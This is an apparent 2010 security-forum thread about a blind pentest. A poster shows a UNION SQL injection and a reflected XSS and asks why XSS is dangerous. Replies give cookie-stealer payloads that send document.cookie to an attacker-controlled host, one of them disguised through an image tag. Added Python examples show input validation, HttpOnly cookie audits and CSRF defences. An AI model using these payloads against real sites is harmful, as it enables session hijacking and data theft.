I don't really get XSS


Post by Cherchemin on Fri Aug 20, 2010 7:55 am

Hi there,

I'm currently doing some blind pentesting and found a good old SQL injection vulnerability which looks like:

index.php?var1=something&id_stuff=1 union all select 1,table_name,3 from information_schema.tables--

So clearly "id_stuff" is wide open (as far as I can tell, it only escapes quotes).

But I also saw that whatever I type in "id_stuff", it is then repeated on the resulting webpage.
So if I'm learning right, that's called an XSS vulnerability. I then tried this:

index.php?var1=something&id_stuff=1--<PLAINTEXT>

and saw the resulting page was showing source code (so the plaintext tag was doing its job).

Still I don't really get how this kind of XSS attack is dangerous. (I'm myself much better at doing SQL injection ones.)
As my "defacing" is only shown to me, I don't understand how you can exploit such vulnerabilities. Everything I read on the Net always shows a wonderful alert in JavaScript, which is pretty useless in my case (since there is no cookie to steal and my injection doesn't last).

So what is XSS really good for?

P.S.: On a side note, I'm going to suggest in my pentesting report that "id_stuff" should be int only. I suppose it's enough to fix the whole thing?
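Added example, not code from the thread: the same page pattern the question describes (the parameter lands in the query text and is echoed back into the HTML) next to the fix proposed in the P.S. (int-only id), with parameter binding and HTML escaping added as defence in depth. The in-memory SQLite table is a constructed stand-in for the site's database, with sqlite_master playing the role of information_schema.tables; the function and parameter names are hypothetical.

```python
import html
import re
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for the site's real one."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE stuff (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO stuff VALUES (?, ?)",
                     [(1, "widget"), (2, "gadget")])
    return conn


def vulnerable_page(conn: sqlite3.Connection, id_stuff: str) -> str:
    """The pattern from the thread: id_stuff is pasted into the SQL text and
    then reflected into the HTML untouched. Escaping quotes alone does not
    help here, because the value sits in an unquoted numeric context and the
    reflected markup needs no quotes either."""
    rows = conn.execute(
        f"SELECT name FROM stuff WHERE id = {id_stuff}").fetchall()
    names = ", ".join(r[0] for r in rows)
    return f"<p>Results for {id_stuff}: {names}</p>"


# Int-only check: a plain decimal integer of sane length, nothing else.
_INT_ONLY = re.compile(r"[0-9]{1,9}")


def parse_id(raw: str) -> Optional[int]:
    """Return the id as an int when raw is a plain decimal integer, else None."""
    return int(raw) if _INT_ONLY.fullmatch(raw) else None


def hardened_page(conn: sqlite3.Connection, id_stuff: str) -> str:
    """Same page with three changes: the id is validated as an int (the fix
    from the P.S.), it is bound as a query parameter rather than pasted into
    the SQL, and anything reflected into the HTML is escaped."""
    id_val = parse_id(id_stuff)
    if id_val is None:
        return "<p>Invalid id</p>"  # hypothetical error page
    rows = conn.execute("SELECT name FROM stuff WHERE id = ?",
                        (id_val,)).fetchall()
    names = ", ".join(html.escape(r[0]) for r in rows)
    return f"<p>Results for {html.escape(str(id_val))}: {names}</p>"


if __name__ == "__main__":
    db = make_db()
    # The two payloads from the question, adapted to SQLite syntax.
    for payload in ("1",
                    "1 union all select name from sqlite_master",
                    "1--<PLAINTEXT>"):
        print("vulnerable:", vulnerable_page(db, payload))
        print("hardened:  ", hardened_page(db, payload))
```

Running it shows the vulnerable page leaking the table name and echoing the raw `<PLAINTEXT>` tag, while the hardened page rejects both payloads before they reach the query. The int check on its own would already close both holes for this parameter; the binding and escaping are there so the page stays safe if someone later widens what the parameter accepts.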


Re: I don't really get XSS

Post by tremor77 on Fri Aug 20, 2010 9:17 am

What you are creating is a temporary XSS, injecting code that is only run by you... the danger in this particular case is showing source code... but not a permanent defacement of the webpage.

Permanent XSS on the other hand is quite dangerous. This is generally due to an unsanitized user input box, URL GET, etc., which could potentially end up saving malicious code in the database or the page itself.

I think the way to take advantage of a temporary XSS exploit, however... is to use a referral link to send browsers to that exploit in such a manner that they load a cookie stealer into the site. Something like...

Code: Select all
<a href="xyz.com/login.php?var1=<script src="abc.com/cookiestealer.js">CLICK HERE TO LOGIN TO XYZ.COM</a>


My example is rough... but that's the general concept... it's not the site that has the vulnerability but the users visiting the site who are vulnerable.

sanddbox will correct me if I'm wrong :)


Re: I don't really get XSS

Post by fashizzlepop on Fri Aug 20, 2010 10:50 am

Yup, you got it, tremor. Of course, if other parts of the site are vulnerable, this could also be one way to spread an XSS worm.
The glass is neither half-full nor half-empty; it's merely twice as big as it needs to be.


Re: I don't really get XSS

Post by 0xBEEF1337 on Fri Aug 20, 2010 1:10 pm

Delete.
Last edited by 0xBEEF1337 on Sat Jan 29, 2011 3:21 pm, edited 1 time in total.


Re: I don't really get XSS

Post by Cherchemin on Fri Aug 20, 2010 2:49 pm

Thanks for the reply. I won't say XSS is now clearer to me, but your answers help!

Time for some more reading about XSS I guess :)


Re: I don't really get XSS

Post by sanddbox on Sat Aug 21, 2010 1:50 am

Tremor: That example wouldn't work. I believe this would:

Code: Select all
<script>window.location="http://myevilsite.com/cookiestealer.php?cookies=" + document.cookie;</script>


If you don't want your victim to know they're getting wtfpwned, instead of just redirecting them as in the above example, embed the link in an image tag. It's the same concept, though.

HTS User Composition:
95% Male
4.98% Female
.01% Monica
.01% Goat
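Added example, not code from the thread: both tremor77's and sanddbox's payloads depend on script being able to read `document.cookie`, and the defender's counterpart is the cookie attributes the server sets. This script parses Set-Cookie headers, reports which cookie names a browser would expose to `document.cookie` (everything not marked HttpOnly), and audits the session cookie for the attributes that blunt this kind of theft. The headers, the cookie names and the function names are constructed for the example.

```python
from http.cookies import SimpleCookie
from typing import Dict, List

# Constructed Set-Cookie headers: what a server might send before and after hardening.
WEAK_HEADERS = [
    "PHPSESSID=abc123; Path=/",
    "theme=dark; Path=/",
]
HARDENED_HEADERS = [
    "PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax",
    "theme=dark; Path=/",
]

# Cookie names that carry authentication and therefore must never reach script.
SESSION_COOKIES = ("PHPSESSID",)


def parse_set_cookie(header: str) -> Dict[str, object]:
    """Break one Set-Cookie header into its name, value and security attributes."""
    jar = SimpleCookie()
    jar.load(header)
    (name, morsel), = jar.items()  # one header, one cookie
    return {
        "name": name,
        "value": morsel.value,
        "httponly": bool(morsel["httponly"]),
        "secure": bool(morsel["secure"]),
        "samesite": morsel["samesite"],
    }


def script_visible_cookies(headers: List[str]) -> List[str]:
    """Names that document.cookie would expose. Browsers hide HttpOnly cookies
    from script, so an injected <script> reading document.cookie sees only these."""
    return [c["name"] for c in map(parse_set_cookie, headers) if not c["httponly"]]


def audit_session_cookies(headers: List[str]) -> List[str]:
    """Findings for session cookies missing HttpOnly, Secure or SameSite."""
    findings: List[str] = []
    for c in map(parse_set_cookie, headers):
        if c["name"] not in SESSION_COOKIES:
            continue
        if not c["httponly"]:
            findings.append(f"{c['name']}: missing HttpOnly")
        if not c["secure"]:
            findings.append(f"{c['name']}: missing Secure")
        if not c["samesite"]:
            findings.append(f"{c['name']}: missing SameSite")
    return findings


if __name__ == "__main__":
    for label, headers in (("weak", WEAK_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(label, "exposed to document.cookie:", script_visible_cookies(headers))
        print(label, "findings:", audit_session_cookies(headers) or "none")
```

HttpOnly removes the session cookie from what a reflected script can read, which is exactly what both payloads above collect. It does not stop script that runs in the victim's page from acting inside the victim's session (submitting forms, as Cryptovirus notes further down), so it is a mitigation on top of fixing the reflection, not a replacement for it.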


Re: I don't really get XSS

Post by fashizzlepop on Sun Aug 22, 2010 2:32 pm

Also check out CSRF exploits. Along the same lines.


Re: I don't really get XSS

Post by Cryptovirus on Thu Aug 26, 2010 10:12 am

CSRF exploits aren't exactly along the same lines. CSRF is more dangerous in that your browser doesn't have to "see" active content such as JavaScript, so an image laced with a simple malicious src is enough.

Temporary XSS is much more worthless, although "dangerous" in the sense that cookies could be stolen - however, stealing cookies in this manner is...inelegant, so to speak.

Although you could also post forms using such XSS, making it equivalent to CSRF - even so, the ability of CSRF to hide in plain sight (server side redirects + image) without the need to lure victims to other websites is priceless.
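Added example, not code from the thread: a hypothetical state-changing endpoint with the three checks that stop the CSRF case Cryptovirus describes (a laced image src, which the browser fetches with a GET and the victim's cookies) as well as a cross-site auto-submitted form. The site origin, the endpoint, the session store and the flow functions are all constructed for the example.

```python
import hmac
import secrets
from typing import Dict
from urllib.parse import urlsplit

# Constructed values: the site's own origin and the methods that must never change state.
SITE_ORIGIN = "https://xyz.example"
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Mint a random per-session token, keep it server side and return it so the
    page can embed it in its form as a hidden field."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def same_origin(header_value: str) -> bool:
    """True when an Origin or Referer value points at this site."""
    parts = urlsplit(header_value)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def handle_transfer(session: Dict[str, str], method: str,
                    headers: Dict[str, str], form: Dict[str, str]) -> str:
    """Hypothetical money-transfer endpoint with three CSRF defences."""
    # 1. A state change is not reachable by GET, so an <img src=...> fetch
    #    (always a GET) can never trigger it, cookies or not.
    if method in SAFE_METHODS:
        return "405 state change requires POST"
    # 2. If the browser says where the request came from, it must be us.
    origin = headers.get("Origin") or headers.get("Referer")
    if origin and not same_origin(origin):
        return "403 cross-site request rejected"
    # 3. The form must carry the token this session was issued; constant-time compare.
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "403 missing or wrong CSRF token"
    return f"200 transferred {form['amount']} to {form['to']}"


def legitimate_flow() -> str:
    """The user loads the form (token issued) and submits it from the site."""
    session: Dict[str, str] = {}
    token = issue_csrf_token(session)
    return handle_transfer(session, "POST", {"Origin": SITE_ORIGIN},
                           {"amount": "10", "to": "alice", "csrf_token": token})


def forged_image_flow() -> str:
    """A logged-in user views a page elsewhere whose <img src> points at the
    endpoint. The browser attaches the session cookie, but the request is a GET."""
    session = {"csrf_token": "unused-here"}
    return handle_transfer(session, "GET", {"Referer": "https://evil.example/page"},
                           {"amount": "100", "to": "mallory"})


def forged_post_flow() -> str:
    """A cross-site auto-submitting form: right method, foreign Origin, no valid token."""
    session: Dict[str, str] = {}
    issue_csrf_token(session)
    return handle_transfer(session, "POST", {"Origin": "https://evil.example"},
                           {"amount": "100", "to": "mallory", "csrf_token": "guess"})


if __name__ == "__main__":
    print("legitimate:  ", legitimate_flow())
    print("image src:   ", forged_image_flow())
    print("cross-site:  ", forged_post_flow())
```

The token check is the one that holds on its own; the method and origin checks are cheap extra layers that also cover clients that strip Referer. A SameSite attribute on the session cookie (shown in the cookie example above) adds a fourth layer on the browser side.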